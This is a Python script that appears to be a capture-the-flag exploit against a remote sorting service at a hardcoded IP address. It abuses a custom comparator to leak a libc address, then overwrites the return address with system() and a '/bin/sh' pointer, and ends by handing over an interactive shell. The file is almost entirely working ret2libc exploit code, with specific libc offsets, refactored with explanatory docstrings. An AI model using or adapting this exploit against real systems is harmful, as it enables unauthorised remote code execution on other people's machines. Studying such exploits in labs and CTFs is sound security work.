import sys, socket, time, os, re, telnetlib
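def get_comparator(n, offset):
    """Build the custom comparator source that ``swap`` sends to the service.

    The returned text is a script (its syntax looks like Lua) whose ``f(a,b)``
    ignores both arguments and hands back the next entry of a precomputed
    ``answers`` table.  The table literal itself is produced by the external
    helper ``./compute_answers``, which is not part of this file.

    Args:
        n: element count, passed through to ``./compute_answers``.
        offset: second helper argument, passed through unchanged.

    Returns:
        The comparator source with the helper's (stripped) stdout spliced in.

    Raises:
        TypeError: if ``n`` or ``offset`` is not numeric -- ``%d`` refuses
            anything else, so no free-form text ever reaches the shell.
        RuntimeError: if the helper produced no output.  The original
            silently emitted ``answers = `` and the remote side would then
            have received a broken script.
    """
    cmd = "./compute_answers %d %d" % (n, offset)
    # Context manager so the pipe is closed even if read() raises.
    with os.popen(cmd) as helper:
        answers = helper.read().strip()
    if not answers:
        raise RuntimeError("%s produced no output" % cmd)
    return """
answers = %s
i = 0
function f(a,b)
i = i + 1
return answers[i]
end
""" % answers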
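def wait_for(s, conn=None):
    """Read from the connection until the marker ``s`` has been received.

    Args:
        s: marker text to wait for (same type as what ``recv`` returns).
        conn: socket-like object with ``recv``; defaults to the module-level
            ``sock`` that the original read directly.

    Returns:
        Everything received up to and including the chunk holding the marker.
        (The original returned ``None``; callers that ignore the result are
        unaffected.)

    Raises:
        EOFError: if the peer closes before the marker shows up.  The original
            treated the empty ``recv`` result as just another chunk and spun
            forever.
    """
    conn = sock if conn is None else conn
    # Accumulate instead of testing each chunk alone, so a marker that is
    # split across two recv() results is still found.  s[:0] gives an empty
    # value of the marker's own type (str here; would also work for bytes).
    buf = s[:0]
    while s not in buf:
        chunk = conn.recv(4096)
        if not chunk:
            raise EOFError("connection closed before %r was seen" % (s,))
        buf += chunk
    return buf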
def socket_interact(s):
    """Hand the already-connected socket ``s`` to an interactive telnetlib session.

    ``Telnet.interact`` relays local stdin to the socket and socket output to
    stdout until the connection ends.  Note that ``telnetlib`` is deprecated
    since Python 3.11 and removed in 3.13.
    """
    session = telnetlib.Telnet()
    # Telnet() without a host opens nothing; attach the existing connection.
    session.sock = s
    session.interact()
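def swap(offset, value, conn=None):
    """Run one custom-comparator round and return the value the service reports.

    Sends menu choice ``7``, the comparator source from ``get_comparator``,
    the element count, and ``n`` newline-separated values whose first entry
    is ``value``.  Replies are read until the ``custom`` prompt (the text
    ``custom`` followed by a newline and ``:``) returns; the last
    ``Number 1 is now: <digits>`` line seen is the result.

    Args:
        offset: added to ``n`` and forwarded to ``get_comparator``.
        value: first element of the submitted list.
        conn: socket-like object with ``send``/``recv``; defaults to the
            module-level ``sock`` that the original read directly.

    Returns:
        The integer the service reported for element 1.

    Raises:
        EOFError: if the peer closes before the prompt reappears (the
            original spun forever on empty ``recv`` results).
        ValueError: if the prompt returned without any ``Number 1 is now``
            line (the original died with ``int(None)``).

    Payloads are built as ``str``, i.e. this file targets Python 2 text
    sockets; on Python 3 ``send`` would need ``bytes``.
    """
    conn = sock if conn is None else conn
    n = 1024
    # range() works on both Python 2 and 3; the original used xrange.
    values = [value] + list(range(1, n))
    # The count sent to the service must equal len(values); the original
    # hard-coded "1024" separately from n.
    conn.send("7\n" +
              get_comparator(n, n + offset) +
              "%d\n" % n +
              "\n".join(map(str, values)) + "\n")
    reported = re.compile(r"Number 1 is now: (\d+)")
    prompt = "custom\n:"
    buf = ""
    while prompt not in buf:
        chunk = conn.recv(4096)
        if not chunk:
            raise EOFError("connection closed before the %r prompt" % (prompt,))
        buf += chunk
    matches = reported.findall(buf)
    if not matches:
        raise ValueError("no 'Number 1 is now' line in reply: %r" % (buf[-200:],))
    # Keep the last match, as the original did when several chunks matched.
    return int(matches[-1])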
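# Offsets for the target's libc, as given in the original script.
offset_libc_start_main_ret = 0x19a83
offset_system = 0x3e770
offset_binsh = 0x160264


def main():
    """Run the original script's steps in order, then hand the socket to telnet.

    ``sock`` stays a module global because ``wait_for`` and ``swap`` read it
    when no connection is passed explicitly.  Guarding the body behind
    ``__main__`` means importing this file no longer opens a connection.
    """
    global sock
    sock = socket.create_connection(("188.40.18.75", 1234))
    try:
        wait_for("custom\n:")
        libc = swap(8, 0x41414141) - offset_libc_start_main_ret
        # Single-argument print() form prints identically on Python 2 and 3.
        print("[*] leaked libc base = %s" % hex(libc))
        print("[*] overwriting return addr")
        swap(8, libc + offset_system)
        print("[*] set first argument to /bin/sh")
        swap(10, libc + offset_binsh)
        # trigger return
        sock.send("0\n")
        sock.recv(4096)
        print("[*] Enjoy your shell ;)")
        socket_interact(sock)
    finally:
        sock.close()


if __name__ == "__main__":
    main()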